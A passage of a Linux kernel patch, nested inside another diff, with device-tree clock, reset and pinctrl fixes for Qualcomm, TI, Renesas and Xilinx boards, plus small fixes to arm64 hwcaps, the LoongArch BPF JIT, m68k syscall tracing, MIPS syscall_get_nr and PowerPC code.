+index 1107befc3b091..c103034372fd7 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -712,7 +712,7 @@
+ 			#power-domain-cells = <1>;
+ 			reg = <0x00300000 0x90000>;
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>,
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+ 				 <&rpmcc RPM_SMD_LN_BB_CLK>,
+ 				 <&sleep_clk>,
+ 				 <&pciephy_0>,
+@@ -829,9 +829,11 @@
+ 			compatible = "qcom,msm8996-a2noc";
+ 			reg = <0x00583000 0x7000>;
+ 			#interconnect-cells = <1>;
+-			clock-names = "bus", "bus_a";
++			clock-names = "bus", "bus_a", "aggre2_ufs_axi", "ufs_axi";
+ 			clocks = <&rpmcc RPM_SMD_AGGR2_NOC_CLK>,
+-				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>;
++				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>,
++				 <&gcc GCC_AGGRE2_UFS_AXI_CLK>,
++				 <&gcc GCC_UFS_AXI_CLK>;
+ 		};
+ 
+ 		mnoc: interconnect@5a4000 {
+@@ -1050,7 +1052,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -1118,7 +1120,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -2932,8 +2934,8 @@
+ 			compatible = "qcom,msm8996-apcc";
+ 			reg = <0x06400000 0x90000>;
+ 
+-			clock-names = "xo";
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clock-names = "xo", "sys_apcs_aux";
++			clocks = <&rpmcc RPM_SMD_XO_A_CLK_SRC>, <&apcs_glb>;
+ 
+ 			#clock-cells = <1>;
+ 		};
+@@ -3052,7 +3054,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
+ 				<&gcc GCC_SDCC1_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC1_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3076,7 +3078,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC2_AHB_CLK>,
+ 				<&gcc GCC_SDCC2_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC2_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3383,7 +3385,7 @@
+ 			interrupt-names = "wdog", "fatal", "ready",
+ 					  "handover", "stop-ack";
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			clock-names = "xo";
+ 
+ 			memory-region = <&adsp_mem>;
+diff --git a/arch/arm64/boot/dts/qcom/pmk8350.dtsi b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+index a7ec9d11946df..f0d256d99e62e 100644
+--- a/arch/arm64/boot/dts/qcom/pmk8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+@@ -16,8 +16,9 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8350_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
+-			reg = <0x1300>;
++			compatible = "qcom,pmk8350-pon";
++			reg = <0x1300>, <0x800>;
++			reg-names = "hlos", "pbs";
+ 
+ 			pon_pwrkey: pwrkey {
+ 				compatible = "qcom,pmk8350-pwrkey";
+diff --git a/arch/arm64/boot/dts/qcom/qcs404.dtsi b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+index 80f2d05595fa6..bec1b6e5a67ac 100644
+--- a/arch/arm64/boot/dts/qcom/qcs404.dtsi
++++ b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+@@ -792,7 +792,7 @@
+ 
+ 			clocks = <&gcc GCC_PCIE_0_PIPE_CLK>;
+ 			resets = <&gcc GCC_PCIEPHY_0_PHY_BCR>,
+-				 <&gcc 21>;
++				 <&gcc GCC_PCIE_0_PIPE_ARES>;
+ 			reset-names = "phy", "pipe";
+ 
+ 			clock-output-names = "pcie_0_pipe_clk";
+@@ -1322,12 +1322,12 @@
+ 				 <&gcc GCC_PCIE_0_SLV_AXI_CLK>;
+ 			clock-names = "iface", "aux", "master_bus", "slave_bus";
+ 
+-			resets = <&gcc 18>,
+-				 <&gcc 17>,
+-				 <&gcc 15>,
+-				 <&gcc 19>,
++			resets = <&gcc GCC_PCIE_0_AXI_MASTER_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_SLAVE_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE_0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE_0_BCR>,
+-				 <&gcc 16>;
++				 <&gcc GCC_PCIE_0_AHB_ARES>;
+ 			reset-names = "axi_m",
+ 				      "axi_s",
+ 				      "axi_m_sticky",
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index 58976a1ba06be..b16886f715179 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -3238,8 +3238,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 			cell-index = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 4cdc88d339445..516e70bf04ce9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -4242,8 +4242,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 146a4285c3952..ba684d980cf26 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1287,6 +1287,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_PRIM_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_PRIM_BCR>;
+ 
+@@ -1341,6 +1342,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_SEC_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_SEC_BCR>;
+ 
+@@ -1470,8 +1472,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index a3e15dedd60cb..c289bf0903b45 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -969,7 +969,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd_intr_default {
+-		pins = <54>;
++		pins = "gpio54";
+ 		function = "gpio";
+ 
+ 		input-enable;
+diff --git a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+index 6a8b88cc43853..e1ab5b5189949 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
++++ b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+@@ -40,17 +40,18 @@
+ 	};
+ 
+ 	gpio-keys {
+-		status = "okay";
+ 		compatible = "gpio-keys";
+-		autorepeat;
+ 
+-		key-vol-dn {
++		pinctrl-0 = <&vol_down_n>;
++		pinctrl-names = "default";
++
++		key-volume-down {
+ 			label = "Volume Down";
+ 			gpios = <&tlmm 47 GPIO_ACTIVE_LOW>;
+-			linux,input-type = <1>;
+ 			linux,code = <KEY_VOLUMEDOWN>;
+-			gpio-key,wakeup;
+ 			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
+ 		};
+ 	};
+ 
+@@ -108,6 +109,14 @@
+ 
+ &tlmm {
+ 	gpio-reserved-ranges = <22 2>, <28 6>;
++
++	vol_down_n: vol-down-n-state {
++		pins = "gpio47";
++		function = "gpio";
++		drive-strength = <2>;
++		bias-disable;
++		input-enable;
++	};
+ };
+ 
+ &usb3 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6125.dtsi b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+index 7818fb6c5a10a..271247b371759 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+@@ -442,9 +442,9 @@
+ 			reg = <0x01613000 0x180>;
+ 			#phy-cells = <0>;
+ 
+-			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+-				 <&gcc GCC_AHB2PHY_USB_CLK>;
+-			clock-names = "ref", "cfg_ahb";
++			clocks = <&gcc GCC_AHB2PHY_USB_CLK>,
++				 <&rpmcc RPM_SMD_XO_CLK_SRC>;
++			clock-names = "cfg_ahb", "ref";
+ 
+ 			resets = <&gcc GCC_QUSB2PHY_PRIM_BCR>;
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 7be5fc8dec671..35f621ef9da54 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -342,13 +342,12 @@
+ 		};
+ 
+ 		ramoops: ramoops@ffc00000 {
+-			compatible = "removed-dma-pool", "ramoops";
+-			reg = <0 0xffc00000 0 0x00100000>;
++			compatible = "ramoops";
++			reg = <0 0xffc00000 0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			ftrace-size = <0x0>;
+ 			msg-size = <0x20000 0x20000>;
+-			cc-size = <0x0>;
++			ecc-size = <16>;
+ 			no-map;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+index fb6e5a140c9f6..04c71f74ab72d 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+@@ -33,9 +33,10 @@
+ 		framebuffer: framebuffer@9c000000 {
+ 			compatible = "simple-framebuffer";
+ 			reg = <0 0x9c000000 0 0x2300000>;
+-			width = <1644>;
+-			height = <3840>;
+-			stride = <(1644 * 4)>;
++			/* Griffin BL initializes in 2.5k mode, not 4k */
++			width = <1096>;
++			height = <2560>;
++			stride = <(1096 * 4)>;
+ 			format = "a8r8g8b8";
+ 			/*
+ 			 * That's (going to be) a lot of clocks, but it's necessary due
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index a6270d97a3192..ca7c428a741d4 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -1043,8 +1043,6 @@
+ 				interrupts = <GIC_SPI 604 IRQ_TYPE_LEVEL_HIGH>;
+ 				power-domains = <&rpmhpd SM8350_CX>;
+ 				operating-points-v2 = <&qup_opp_table_100mhz>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 32a37c878a34c..df0d888ffc008 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -991,8 +991,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart20_default>;
+ 				interrupts = <GIC_SPI 587 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1387,8 +1385,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart7_tx>, <&qup_uart7_rx>;
+ 				interrupts = <GIC_SPI 608 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+index 8166e3c1ff4e5..cafde91b4721b 100644
+--- a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
++++ b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+@@ -437,20 +437,6 @@
+ 		};
+ 	};
+ 
+-	/* 0 - lcd_reset */
+-	/* 1 - lcd_pwr */
+-	/* 2 - lcd_select */
+-	/* 3 - backlight-enable */
+-	/* 4 - Touch_shdwn */
+-	/* 5 - LCD_H_pol */
+-	/* 6 - lcd_V_pol */
+-	gpio_exp1: gpio@20 {
+-		compatible = "onnn,pca9654";
+-		reg = <0x20>;
+-		gpio-controller;
+-		#gpio-cells = <2>;
+-	};
+-
+ 	touchscreen@26 {
+ 		compatible = "ilitek,ili2117";
+ 		reg = <0x26>;
+@@ -482,6 +468,16 @@
+ 			};
+ 		};
+ 	};
++
++	gpio_exp1: gpio@70 {
++		compatible = "nxp,pca9538";
++		reg = <0x70>;
++		gpio-controller;
++		#gpio-cells = <2>;
++		gpio-line-names = "lcd_reset", "lcd_pwr", "lcd_select",
++				  "backlight-enable", "Touch_shdwn",
++				  "LCD_H_pol", "lcd_V_pol";
++	};
+ };
+ 
+ &lvds0 {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index 03660476364f3..edcf6b2718814 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -306,7 +306,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 141 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 172 0>;
++		clocks = <&k3_clks 141 0>;
++		status = "disabled";
+ 	};
+ 
+ 	main_spi1: spi@20110000 {
+@@ -316,7 +317,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 142 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 173 0>;
++		clocks = <&k3_clks 142 0>;
++		status = "disabled";
+ 	};
+ 
+ 	main_spi2: spi@20120000 {
+@@ -326,7 +328,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 143 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 174 0>;
++		clocks = <&k3_clks 143 0>;
++		status = "disabled";
+ 	};
+ 
+ 	main_gpio_intr: interrupt-controller@a00000 {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi b/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi
+index f56c803560f26..df2d8f36a31bd 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi
+@@ -42,6 +42,7 @@
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 147 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 147 0>;
++		status = "disabled";
+ 	};
+ 
+ 	mcu_spi1: spi@4b10000 {
+@@ -52,6 +53,7 @@
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 148 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 148 0>;
++		status = "disabled";
+ 	};
+ 
+ 	mcu_gpio_intr: interrupt-controller@4210000 {
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+index 7e8552fd2b6ae..50009f963a324 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
++++ b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+@@ -80,7 +80,7 @@
+ 	};
+ };
+ 
+-&wkup_pmx0 {
++&wkup_pmx2 {
+ 	mcu_cpsw_pins_default: mcu-cpsw-pins-default {
+ 		pinctrl-single,pins = <
+ 			J721E_WKUP_IOPAD(0x0068, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+index d3fb86b2ea939..f04c6c890c33d 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+@@ -56,7 +56,34 @@
+ 	wkup_pmx0: pinctrl@4301c000 {
+ 		compatible = "pinctrl-single";
+ 		/* Proxy 0 addressing */
+-		reg = <0x00 0x4301c000 0x00 0x178>;
++		reg = <0x00 0x4301c000 0x00 0x34>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx1: pinctrl@0x4301c038 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c038 0x00 0x8>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx2: pinctrl@0x4301c068 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c068 0x00 0xec>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx3: pinctrl@0x4301c174 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c174 0x00 0x20>;
+ 		#pinctrl-cells = <1>;
+ 		pinctrl-single,register-width = <32>;
+ 		pinctrl-single,function-mask = <0xffffffff>;
+diff --git a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+index a549265e55f6e..7c1af75f33a05 100644
+--- a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
++++ b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+@@ -825,6 +825,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x860>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+@@ -851,6 +852,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x861>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index b3f37e2209ad3..86b2f7ec6c67e 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2756,7 +2756,7 @@ static const struct arm64_cpu_capabilities arm64_elf_hwcaps[] = {
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_FP_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_FPHP),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 0, CAP_HWCAP, KERNEL_HWCAP_ASIMD),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_ASIMDHP),
+-	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
++	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DCPOP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 2, CAP_HWCAP, KERNEL_HWCAP_DCPODP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_JSCVT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_JSCVT),
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index bdcd0c7719a9e..2467bfb8889a9 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -782,7 +782,7 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		move_imm(ctx, t1, func_addr, is32);
++		move_addr(ctx, t1, func_addr);
+ 		emit_insn(ctx, jirl, t1, LOONGARCH_GPR_RA, 0);
+ 		move_reg(ctx, regmap[BPF_REG_0], LOONGARCH_GPR_A0);
+ 		break;
+diff --git a/arch/loongarch/net/bpf_jit.h b/arch/loongarch/net/bpf_jit.h
+index e665ddb0aeb85..093885539e701 100644
+--- a/arch/loongarch/net/bpf_jit.h
++++ b/arch/loongarch/net/bpf_jit.h
+@@ -80,6 +80,27 @@ static inline void emit_sext_32(struct jit_ctx *ctx, enum loongarch_gpr reg, boo
+ 	emit_insn(ctx, addiw, reg, reg, 0);
+ }
+ 
++static inline void move_addr(struct jit_ctx *ctx, enum loongarch_gpr rd, u64 addr)
++{
++	u64 imm_11_0, imm_31_12, imm_51_32, imm_63_52;
++
++	/* lu12iw rd, imm_31_12 */
++	imm_31_12 = (addr >> 12) & 0xfffff;
++	emit_insn(ctx, lu12iw, rd, imm_31_12);
++
++	/* ori rd, rd, imm_11_0 */
++	imm_11_0 = addr & 0xfff;
++	emit_insn(ctx, ori, rd, rd, imm_11_0);
++
++	/* lu32id rd, imm_51_32 */
++	imm_51_32 = (addr >> 32) & 0xfffff;
++	emit_insn(ctx, lu32id, rd, imm_51_32);
++
++	/* lu52id rd, rd, imm_63_52 */
++	imm_63_52 = (addr >> 52) & 0xfff;
++	emit_insn(ctx, lu52id, rd, rd, imm_63_52);
++}
++
+ static inline void move_imm(struct jit_ctx *ctx, enum loongarch_gpr rd, long imm, bool is32)
+ {
+ 	long imm_11_0, imm_31_12, imm_51_32, imm_63_52, imm_51_0, imm_51_31;
+diff --git a/arch/m68k/68000/entry.S b/arch/m68k/68000/entry.S
+index 997b549330156..7d63e2f1555a0 100644
+--- a/arch/m68k/68000/entry.S
++++ b/arch/m68k/68000/entry.S
+@@ -45,6 +45,8 @@ do_trace:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d1
+ 	movel	#-ENOSYS,%d0
+ 	cmpl	#NR_syscalls,%d1
+diff --git a/arch/m68k/Kconfig.devices b/arch/m68k/Kconfig.devices
+index 6a87b4a5fcac2..e6e3efac18407 100644
+--- a/arch/m68k/Kconfig.devices
++++ b/arch/m68k/Kconfig.devices
+@@ -19,6 +19,7 @@ config HEARTBEAT
+ # We have a dedicated heartbeat LED. :-)
+ config PROC_HARDWARE
+ 	bool "/proc/hardware support"
++	depends on PROC_FS
+ 	help
+ 	  Say Y here to support the /proc/hardware file, which gives you
+ 	  access to information about the machine you're running on,
+diff --git a/arch/m68k/coldfire/entry.S b/arch/m68k/coldfire/entry.S
+index 9f337c70243a3..35104c5417ff4 100644
+--- a/arch/m68k/coldfire/entry.S
++++ b/arch/m68k/coldfire/entry.S
+@@ -90,6 +90,8 @@ ENTRY(system_call)
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%d3,%a0
+ 	jbsr	%a0@
+ 	movel	%d0,%sp@(PT_OFF_D0)		/* save the return value */
+diff --git a/arch/m68k/kernel/entry.S b/arch/m68k/kernel/entry.S
+index 18f278bdbd218..42879e6eb651d 100644
+--- a/arch/m68k/kernel/entry.S
++++ b/arch/m68k/kernel/entry.S
+@@ -184,9 +184,12 @@ do_trace_entry:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0			| optimization for cmpil #-1,%d0
++	jeq	ret_from_syscall
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d0
+ 	cmpl	#NR_syscalls,%d0
+ 	jcs	syscall
++	jra	ret_from_syscall
+ badsys:
+ 	movel	#-ENOSYS,%sp@(PT_OFF_D0)
+ 	jra	ret_from_syscall
+diff --git a/arch/mips/boot/dts/ingenic/ci20.dts b/arch/mips/boot/dts/ingenic/ci20.dts
+index f38c39572a9e8..8f21d2304737c 100644
+--- a/arch/mips/boot/dts/ingenic/ci20.dts
++++ b/arch/mips/boot/dts/ingenic/ci20.dts
+@@ -113,7 +113,7 @@
+ 		regulator-min-microvolt = <5000000>;
+ 		regulator-max-microvolt = <5000000>;
+ 
+-		gpio = <&gpf 14 GPIO_ACTIVE_LOW>;
++		gpio = <&gpf 15 GPIO_ACTIVE_LOW>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/mips/include/asm/syscall.h b/arch/mips/include/asm/syscall.h
+index 25fa651c937d5..ebdf4d910af2f 100644
+--- a/arch/mips/include/asm/syscall.h
++++ b/arch/mips/include/asm/syscall.h
+@@ -38,7 +38,7 @@ static inline bool mips_syscall_is_indirect(struct task_struct *task,
+ static inline long syscall_get_nr(struct task_struct *task,
+ 				  struct pt_regs *regs)
+ {
+-	return current_thread_info()->syscall;
++	return task_thread_info(task)->syscall;
+ }
+ 
+ static inline void mips_syscall_update_nr(struct task_struct *task,
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index dc4cbf0a5ca95..4fd630efe39d3 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -90,7 +90,7 @@ aflags-$(CONFIG_CPU_LITTLE_ENDIAN)	+= -mlittle-endian
+ 
+ ifeq ($(HAS_BIARCH),y)
+ KBUILD_CFLAGS	+= -m$(BITS)
+-KBUILD_AFLAGS	+= -m$(BITS) -Wl,-a$(BITS)
++KBUILD_AFLAGS	+= -m$(BITS)
+ KBUILD_LDFLAGS	+= -m elf$(BITS)$(LDEMULATION)
+ endif
+ 
+diff --git a/arch/powerpc/mm/book3s64/radix_tlb.c b/arch/powerpc/mm/book3s64/radix_tlb.c
+index 4e29b619578c1..6d7a1ef723e69 100644
+--- a/arch/powerpc/mm/book3s64/radix_tlb.c
++++ b/arch/powerpc/mm/book3s64/radix_tlb.c
+@@ -1179,15 +1179,12 @@ static inline void __radix__flush_tlb_range(struct mm_struct *mm,
+ 			}
+ 		}
+ 	} else {
+-		bool hflush = false;
++		bool hflush;
+ 		unsigned long hstart, hend;
+ 
+-		if (IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE)) {
